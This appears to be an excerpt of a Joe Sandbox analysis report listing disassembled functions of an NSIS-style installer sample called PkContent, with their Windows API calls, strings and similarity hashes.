                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                • API String ID: 1641139501-220328614
                                                • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                Strings
                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID: created uninstaller: %d, "%s"
                                                • API String ID: 3294113728-3145124454
                                                • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                APIs
                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                • API String ID: 3734993849-2769509956
                                                • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                • GetSysColor.USER32(00000000), ref: 00403E00
                                                • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                • SetBkMode.GDI32(?,?), ref: 00403E18
                                                • GetSysColor.USER32(?), ref: 00403E2B
                                                • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                • DeleteObject.GDI32(?), ref: 00403E55
                                                • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                Strings
                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                • API String ID: 1033533793-945480824
                                                • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                APIs
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                  • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                Strings
                                                • Exec: success ("%s"), xrefs: 00402263
                                                • Exec: command="%s", xrefs: 00402241
                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                • API String ID: 2014279497-3433828417
                                                • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                • GetMessagePos.USER32 ref: 00404871
                                                • ScreenToClient.USER32(?,?), ref: 00404889
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                • MulDiv.KERNEL32(00029A00,00000064,?), ref: 00403295
                                                • wsprintfW.USER32 ref: 004032A5
                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                Strings
                                                • verifying installer: %d%%, xrefs: 0040329F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                APIs
                                                • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                • wsprintfW.USER32 ref: 00404457
                                                • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
